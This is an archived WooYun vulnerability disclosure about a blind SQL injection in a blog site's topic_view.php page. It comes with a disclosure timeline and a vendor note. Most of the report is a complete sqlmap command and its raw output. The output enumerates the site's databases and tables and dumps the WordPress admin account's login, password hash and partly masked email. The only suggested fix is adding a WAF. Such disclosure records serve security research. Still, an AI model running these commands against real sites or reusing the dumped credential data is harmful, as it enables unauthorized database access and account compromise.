乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
什么时候能买套房?
地址:http://**.**.**.**/topic_view.php?topicid=246
$ python sqlmap.py -u "http://**.**.**.**/topic_view.php?topicid=246" -p topicid --technique=B --random-agent --batch --no-cast -D princetw_blog -T wp_users -C user_login,user_pass,user_email --dump
Database: princetw_blogTable: wp_users[1 entry]+------------+------------------------------------+--------------------+| user_login | user_pass | user_email |+------------+------------------------------------+--------------------+| admin | $P$9FplHSzboldLGi93hTXuuOdQ9WTE4v. | newhouse@**.**.**.** |+------------+------------------------------------+--------------------+
---web application technology: PHP 5.4.22, Apache 2.0.64back-end DBMS: MySQL 5available databases [4]:[*] information_schema[*] princetw_blog[*] princetw_test[*] princetw_utfsqlmap resumed the following injection point(s) from stored session:---Parameter: topicid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: topicid=246 AND 7614=7614---web application technology: PHP 5.4.22, Apache 2.0.64back-end DBMS: MySQL 5Database: princetw_blog[10 tables]+-----------------------+| wp_comments || wp_links || wp_options || wp_postmeta || wp_posts || wp_term_relationships || wp_term_taxonomy || wp_terms || wp_usermeta || wp_users |+-----------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: topicid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: topicid=246 AND 7614=7614---web application technology: PHP 5.4.22, Apache 2.0.64back-end DBMS: MySQL 5sqlmap resumed the following injection point(s) from stored session:---Parameter: topicid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: topicid=246 AND 7614=7614---web application technology: PHP 5.4.22, Apache 2.0.64back-end DBMS: MySQL 5Database: princetw_blogTable: wp_users[10 columns]+---------------------+---------------------+| Column | Type |+---------------------+---------------------+| display_name | varchar(250) || ID | bigint(20) unsigned || user_activation_key | varchar(60) || user_email | varchar(100) || user_login | varchar(60) || user_nicename | varchar(50) || user_pass | varchar(64) || user_registered | datetime || user_status | int(11) || user_url | varchar(100) |+---------------------+---------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: topicid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: topicid=246 AND 7614=7614---web application technology: PHP 5.4.22, Apache 2.0.64back-end DBMS: MySQL 5Database: princetw_blog+----------+---------+| Table | Entries |+----------+---------+| wp_users | 1 |+----------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: topicid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: topicid=246 AND 7614=7614---web application technology: PHP 5.4.22, Apache 2.0.64back-end DBMS: MySQL 5Database: princetw_blogTable: wp_users[1 entry]+------------+------------------------------------+--------------------+| user_login | user_pass | user_email |+------------+------------------------------------+--------------------+| admin | $P$9FplHSzboldLGi93hTXuuOdQ9WTE4v. | newhouse@**.**.**.** |+------------+------------------------------------+--------------------+
上WAF。
危害等级:高
漏洞Rank:16
确认时间:2015-12-07 01:40
感謝通報
2016-02-20:HITCON 於接獲通報後多次 email 該網站所示之服務信箱,至漏洞公開時仍無回應。
